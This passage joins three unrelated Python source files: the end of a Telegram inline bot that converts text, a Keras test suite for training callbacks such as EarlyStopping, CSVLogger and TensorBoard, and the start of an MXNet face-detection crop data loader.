inline_query_id=inline_query_id, results=json.dumps(results), **kwargs) def updatebotinfo(): global CFG d = bot_api('getMe') CFG['username'] = d.get('username') def getupdates(): global CFG while 1: try: updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10) except Exception: logger_botapi.exception('Get updates failed.') continue if updates: #logger_botapi.debug('Messages coming: %r', updates) CFG['offset'] = updates[-1]["update_id"] + 1 for upd in updates: MSG_Q.put(upd) time.sleep(.2) def handle_api_update(d: dict): logger_botapi.debug('Update: %r' % d) try: if 'inline_query' in d: query = d['inline_query'] text = query['query'].strip() imeresult = brokenime.breakime(text) if imeresult: r = answer(query['id'], [{'type': 'article', 'id': str(time.time()), 'title': ret, 'input_message_content': {'message_text': ret}, 'description': desc} for desc, ret in imeresult]) logger_botapi.debug(r) logger_botapi.info('%s -> %s', text, imeresult) elif 'message' in d: msg = d['message'] if msg['chat']['type'] == 'private': imeresult = brokenime.breakime(msg.get('text', '').strip()) if imeresult: bot_api('sendMessage', chat_id=msg['chat']['id'], text=imeresult[0][1], reply_to_message_id=msg['message_id']) except Exception: logger_botapi.exception('Failed to process a message.') def load_config(): return AttrDict(json.load(open('config.json', encoding='utf-8'))) def save_config(): json.dump(CFG, open('config.json', 'w'), sort_keys=True, indent=1) if __name__ == '__main__': CFG = load_config() MSG_Q = queue.Queue() jieba.initialize() try: updatebotinfo() apithr = threading.Thread(target=getupdates) apithr.daemon = True apithr.start() while 1: handle_api_update(MSG_Q.get()) finally: save_config()
test_callbacks.py
import os import multiprocessing import numpy as np import pytest from csv import reader from csv import Sniffer import shutil from keras import optimizers from keras import initializers from keras import callbacks from keras.models import Sequential, Model from keras.layers import Input, Dense, Dropout, add from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D from keras.utils.test_utils import get_test_data from keras.utils.test_utils import keras_test from keras import backend as K from keras.utils import np_utils try: from unittest.mock import patch except: from mock import patch input_dim = 2 num_hidden = 4 num_classes = 2 batch_size = 5 train_samples = 20 test_samples = 20 @keras_test def test_TerminateOnNaN(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN()] model = Sequential() initializer = initializers.Constant(value=1e5) for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu', kernel_initializer=initializer)) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') # case 1 fit history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf # case 2 fit_generator def data_generator(): max_batch_index = len(X_train) // batch_size i = 0 while 1: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train), validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf or np.isnan(loss[0]) @keras_test def test_stop_training_csv(tmpdir): np.random.seed(1337) fp = str(tmpdir / 'test.csv') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN(), callbacks.CSVLogger(fp)] model = Sequential() for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(X_train) // batch_size tot = 0 while 1: if tot > 3 * len(X_train): yield np.ones([batch_size, input_dim]) * np.nan, np.ones([batch_size, num_classes]) * np.nan else: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 tot += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train) // batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: for x in reader(f): values.append(x) assert 'nan' in values[-1], 'The last epoch was not logged.' os.remove(fp) @keras_test def test_ModelCheckpoint(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'checkpoint.h5') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) # case 1 monitor = 'val_loss' save_best_only = False mode = 'auto' model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 2 mode = 'min' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 3 mode = 'max' monitor = 'val_acc' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 4 save_best_only = True cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) os.remove(filepath) # case 5 save_best_only = False period = 2 mode = 'auto' filepath = 'checkpoint.{epoch:02d}.h5' cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor, save_best_only=save_best_only, mode=mode, period=period)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=4) assert os.path.isfile(filepath.format(epoch=2)) assert os.path.isfile(filepath.format(epoch=4)) assert not os.path.exists(filepath.format(epoch=1)) assert not os.path.exists(filepath.format(epoch=3)) os.remove(filepath.format(epoch=2)) os.remove(filepath.format(epoch=4)) assert not tmpdir.listdir() @keras_test def test_EarlyStopping(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) mode = 'max' monitor = 'val_acc' patience = 0 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) mode = 'auto' monitor = 'val_acc' patience = 2 cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)] history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) @keras_test def test_EarlyStopping_reuse(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = Sequential(( Dense(1, input_dim=1, activation='relu'), Dense(1, activation='sigmoid'), )) model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) stopper = callbacks.EarlyStopping(monitor='acc', patience=patience) weights = model.get_weights() hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience # This should allow training to go for at least `patience` epochs model.set_weights(weights) hist = model.fit(data, labels, callbacks=[stopper], epochs=20) assert len(hist.epoch) >= patience @keras_test def test_EarlyStopping_patience(): class DummyModel(object): def __init__(self): self.stop_training = False early_stop = callbacks.EarlyStopping(monitor='val_loss', patience=2) early_stop.model = DummyModel() losses = [0.0860, 0.1096, 0.1040, 0.1019] # Should stop after epoch 3, as the loss has not improved after patience=2 epochs. epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break assert epochs_trained == 3 @keras_test def test_LearningRateScheduler(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon() @keras_test def test_ReduceLROnPlateau(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon()) model = make_model() cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2) assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon()) @keras_test def test_CSVLogger(tmpdir): np.random.seed(1337) filepath = str(tmpdir / 'log.tsv') sep = '\t' (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) assert os.path.isfile(filepath) with open(filepath) as csvfile: dialect = Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) # case 3, reuse of CSVLogger object model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) import re with open(filepath) as csvfile: output = " ".join(csvfile.readlines()) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0), epochs=3) # fit with validation data and accuracy model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=0), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=(X_test, y_test), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_TensorBoard_histogram_freq_must_have_validation_data(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index inp = Input((input_dim,)) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=inp, outputs=output) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data should raise ValueError if histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit(X_train, y_train, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=1), epochs=3) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator without validation data should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) # fit generator with validation data generator should raise ValueError if # histogram_freq > 0 with pytest.raises(ValueError) as raised_exception: model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=data_generator(False), validation_steps=1, callbacks=callbacks_factory(histogram_freq=1)) assert 'validation_data must be provided' in str(raised_exception.value) @keras_test def test_TensorBoard_multi_input_output(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data( num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: # simulate multi-input/output models yield ([X_train[i * batch_size: (i + 1) * batch_size]] * 2, [y_train[i * batch_size: (i + 1) * batch_size]] * 2) else: yield ([X_test[i * batch_size: (i + 1) * batch_size]] * 2, [y_test[i * batch_size: (i + 1) * batch_size]] * 2) i += 1 i = i % max_batch_index inp1 = Input((input_dim,)) inp2 = Input((input_dim,)) inp = add([inp1, inp2]) hidden = Dense(num_hidden, activation='relu')(inp) hidden = Dropout(0.1)(hidden) output1 = Dense(num_classes, activation='softmax')(hidden) output2 = Dense(num_classes, activation='softmax')(hidden) model = Model(inputs=[inp1, inp2], outputs=[output1, output2]) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # we must generate new callbacks for each test, as they aren't stateless def callbacks_factory(histogram_freq): return [callbacks.TensorBoard(log_dir=filepath, histogram_freq=histogram_freq, write_images=True, write_grads=True, embeddings_freq=1, embeddings_layer_names=['dense_1'], batch_size=5)] # fit without validation data model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, callbacks=callbacks_factory(histogram_freq=0), epochs=3) # fit with validation data and accuracy model.fit([X_train] * 2, [y_train] * 2, batch_size=batch_size, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1), epochs=2) # fit generator without validation data model.fit_generator(data_generator(True), len(X_train), epochs=2, callbacks=callbacks_factory(histogram_freq=0)) # fit generator with validation data and accuracy model.fit_generator(data_generator(True), len(X_train), epochs=2, validation_data=([X_test] * 2, [y_test] * 2), callbacks=callbacks_factory(histogram_freq=1)) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_TensorBoard_convnet(tmpdir): np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') input_shape = (16, 16, 3) (x_train, y_train), (x_test, y_test) = get_test_data(num_train=500, num_test=200, input_shape=input_shape, classification=True, num_classes=num_classes) y_train = np_utils.to_categorical(y_train) y_test = np_utils.to_categorical(y_test) model = Sequential([ Conv2D(filters=8, kernel_size=3, activation='relu', input_shape=input_shape), MaxPooling2D(pool_size=2), Conv2D(filters=4, kernel_size=(3, 3), activation='relu', padding='same'), GlobalAveragePooling2D(), Dense(num_classes, activation='softmax') ]) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1, write_images=True, write_grads=True, batch_size=16) cbks = [tsb] model.summary() history = model.fit(x_train, y_train, epochs=2, batch_size=16, validation_data=(x_test, y_test), callbacks=cbks, verbose=0) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def test_CallbackValData(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=[cbk], epochs=1) def data_generator(train): if train: max_batch_index = len(X_train) // batch_size else: max_batch_index = len(X_test) // batch_size i = 0 while 1: if train: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) else: yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1) model.fit_generator(data_generator(True), len(X_train), epochs=1, validation_data=(X_test, y_test), callbacks=[cbk2]) # callback validation data should always have x, y, and sample weights assert len(cbk.validation_data) == len(cbk2.validation_data) == 3 assert cbk.validation_data[0] is cbk2.validation_data[0] assert cbk.validation_data[1] is cbk2.validation_data[1] assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape @keras_test def test_LambdaCallback(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model training and be terminated after training has completed. def f(): while True: pass p = multiprocessing.Process(target=f) p.start() cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate()) cbks = [cleanup_callback] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=5) p.join() assert not p.is_alive() @keras_test def test_TensorBoard_with_ReduceLROnPlateau(tmpdir): import shutil np.random.seed(np.random.randint(1, 1e7)) filepath = str(tmpdir / 'logs') (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.5, patience=4, verbose=1), callbacks.TensorBoard( log_dir=filepath)] model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=2) assert os.path.isdir(filepath) shutil.rmtree(filepath) assert not tmpdir.listdir() @keras_test def tests_RemoteMonitor(): (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = Sequential() model.add(Dense(num_hidden, input_dim=input_dim, activation='relu')) model.add(Dense(num_classes, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [callbacks.RemoteMonitor()] with patch('requests.post'): model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=1) if __name__ == '__main__': pytest.main([__file__])
loader.py
from __future__ import print_function import sys import mxnet as mx import numpy as np import random import datetime import multiprocessing import cv2 from mxnet.executor_manager import _split_input_slice from rcnn.config import config from rcnn.io.image import tensor_vstack from rcnn.io.rpn import get_rpn_testbatch, get_rpn_batch, assign_anchor_fpn, get_crop_batch, AA class CropLoader(mx.io.DataIter): def __init__(self, feat_sym, roidb, batch_size=1, shuffle=False, ctx=None, work_load_list=None, aspect_grouping=False): """ This Iter will provide roi data to Fast R-CNN network :param feat_sym: to infer shape of assign_output :param roidb: must be preprocessed :param batch_size: must divide BATCH_SIZE(128) :param shuffle: bool :param ctx: list of contexts :param work_load_list: list of work load :param aspect_grouping: group images with similar aspects :return: AnchorLoader """ super(CropLoader, self).__init__() # save parameters as properties self.feat_sym = feat_sym self.roidb = roidb self.batch_size = batch_size self.shuffle = shuffle self.ctx = ctx if self.ctx is None: self.ctx = [mx.cpu()] self.work_load_list = work_load_list #self.feat_stride = feat_stride #self.anchor_scales = anchor_scales #self.anchor_ratios = anchor_ratios #self.allowed_border = allowed_border self.aspect_grouping = aspect_grouping self.feat_stride = config.RPN_FEAT_STRIDE # infer properties from roidb self.size = len(roidb) self.index = np.arange(self.size) # decide data and label names #self.data_name = ['data'] #self.label_name = [] #self.label_name.append('label') #self.label_name.append('bbox_target') #self.label_name.append('bbox_weight') self.data_name = ['data'] #self.label_name = ['label', 'bbox_target', 'bbox_weight'] self.label_name = [] prefixes = ['face'] if config.HEAD_BOX: prefixes.append('head') names = [] for prefix in prefixes: #names += [prefix+'_label', prefix+'_bbox_anchor', prefix+'_bbox_target', prefix+'_bbox_weight'] names += [prefix+'_label', prefix+'_bbox_target', prefix+'_bbox_weight'] if prefix=='face' and config.FACE_LANDMARK: names += [prefix+'_landmark_target', prefix+'_landmark_weight'] #names = ['label', 'bbox_weight'] for stride in self.feat_stride: for n in names: k = "%s_stride%d"%(n,stride) self.label_name.append(k) # status variable for synchronization between get_data and get_label self.cur = 0 self.batch = None self.data = None self.label = None # infer shape feat_shape_list = [] _data_shape = [('data', (1, 3, max([v[1] for v in config.SCALES]), max([v[1] for v in config.SCALES])))] _data_shape = dict(_data_shape) for i in range(len(self.feat_stride)): _, feat_shape, _ = self.feat_sym[i].infer_shape(**_data_shape) feat_shape = [int(i) for i in feat_shape[0]] feat_shape_list.append(feat_shape) self.aa = AA(feat_shape_list) self._debug = False self._debug_id = 0 self._times = [0.0, 0.0, 0.0, 0.0] # get first batch to fill in provide_data and provide_label self.reset() self.get_batch() @property def provide_data(self): return [(k, v.shape) for k, v in zip(self.data_name, self.data)] @property def provide_label(self): return [(k, v.shape) for k, v in zip(self.label_name, self.label)] def reset(self): self.cur = 0 if self.shuffle: np.random.shuffle(self.index) def iter_next(self): return self.cur + self.batch_size <= self.size def next(self): if self.iter_next(): self.get_batch() self.cur += self.batch_size return mx.io.DataBatch(data=self.data, label=self.label, pad=self.getpad(), index=self.getindex(), provide_data=self.provide_data, provide_label=self.provide_label) else: raise StopIteration def getindex(self): return self.cur / self.batch_size def getpad(self): if self.cur + self.batch_size > self.size: return self.cur + self.batch_size - self.size else: return 0 def infer_shape(self, max_data_shape=None, max_label_shape=None): """ Return maximum data and label shape for single gpu """ if max_data_shape is None: max_data_shape = [] if max_label_shape is None: max_label_shape = [] max_shapes = dict(max_data_shape + max_label_shape) input_batch_size = max_shapes['data'][0] dummy_boxes = np.zeros((0, 5)) dummy_info = [ [max_shapes['data'][2], max_shapes['data'][3], 1.0] ] dummy_label = {'gt_boxes' : dummy_boxes} dummy_blur = np.zeros((0,)) dummy_label['gt_blur'] = dummy_blur label_dict = {} if config.HEAD_BOX: head_label_dict = self.aa.assign_anchor_fpn(dummy_label, dummy_info, False, prefix='head') label_dict.update(head_label_dict) if config.FACE_LANDMARK: dummy_landmarks = np.zeros( (0,5,3) ) dummy_label['gt_landmarks'] = dummy_landmarks face_label_dict = self.aa.assign_anchor_fpn(dummy_label, dummy_info, config.FACE_LANDMARK, prefix='face') label_dict.update(face_label_dict) label_list = [] for k in self.label_name: label_list.append(label_dict[k]) label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label_list)] print(label_shape) return max_data_shape, label_shape def get_batch(self): # slice roidb cur_from = self.cur cur_to = min(cur_from + self.batch_size, self.size) assert cur_to==cur_from+self.batch_size roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)] # decide multi device slice work_load_list = self.work_load_list ctx = self.ctx if work_load_list is None: work_load_list = [1] * len(ctx) assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \ "Invalid settings for work load. " slices = _split_input_slice(self.batch_size, work_load_list) # get testing data for multigpu data_list = [] label_list = [] for islice in slices: iroidb = [roidb[i] for i in range(islice.start, islice.stop)] data, label = get_crop_batch(iroidb) data_list += data label_list += label #data_list.append(data) #label_list.append(label) # pad data first and then assign anchor (read label) #data_tensor = tensor_vstack([batch['data'] for batch in data_list]) #for i_card in range(len(data_list)): # data_list[i_card]['data'] = data_tensor[ # i_card * config.TRAIN.BATCH_IMAGES:(1 + i_card) * config.TRAIN.BATCH_IMAGES] #iiddxx = 0 select_stride = 0 if config.RANDOM_FEAT_STRIDE: select_stride = random.choice(config.RPN_FEAT_STRIDE) for data, label in zip(data_list, label_list): data_shape = {k: v.shape for k, v in data.items()} del data_shape['im_info'] feat_shape_list = [] for s in range(len(self.feat_stride)): _, feat_shape, _ = self.feat_sym[s].infer_shape(**data_shape) feat_shape = [int(i) for i in feat_shape[0]] feat_shape_list.append(feat_shape) im_info = data['im_info'] gt_boxes = label['gt_boxes'] gt_label = {'gt_boxes':gt_boxes} if config.USE_BLUR: gt_blur = label['gt_blur'] gt_label['gt_blur'] = gt_blur if self._debug: img = data['data'].copy()[0].transpose( (1,2,0) )[:,:,::-1].copy() print('DEBUG SHAPE', data['data'].shape, label['gt_boxes'].shape) box = label['gt_boxes'].copy()[0][0:4].astype(np.int) cv2.rectangle(img, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 2) filename = './debugout/%d.png' % (self._debug_id) print('debug write', filename) cv2.imwrite(filename, img) self._debug_id+=1 #print('DEBUG', img.shape, bbox.shape) label_dict = {} if config.HEAD_BOX: head_label_dict = self.aa.assign_anchor_fpn(gt_label, im_info, False, prefix='head', select_stride = select_stride) label_dict.update(head_label_dict) if config.FACE_LANDMARK: gt_landmarks = label['gt_landmarks'] gt_label['gt_landmarks'] = gt_landmarks #ta = datetime.datetime.now() #face_label_dict = assign_anchor_fpn(feat_shape_list, gt_label, im_info, config.FACE_LANDMARK, prefix='face', select_stride = select_stride) face_label_dict = self.aa.assign_anchor_fpn(gt_label, im_info, config.FACE_LANDMARK, prefix='face', select_stride = select_stride) #tb = datetime.datetime.now() #self._times[0] += (tb-ta).total_seconds() label_dict.update(face_label_dict) #print('im_info', im_info.shape) 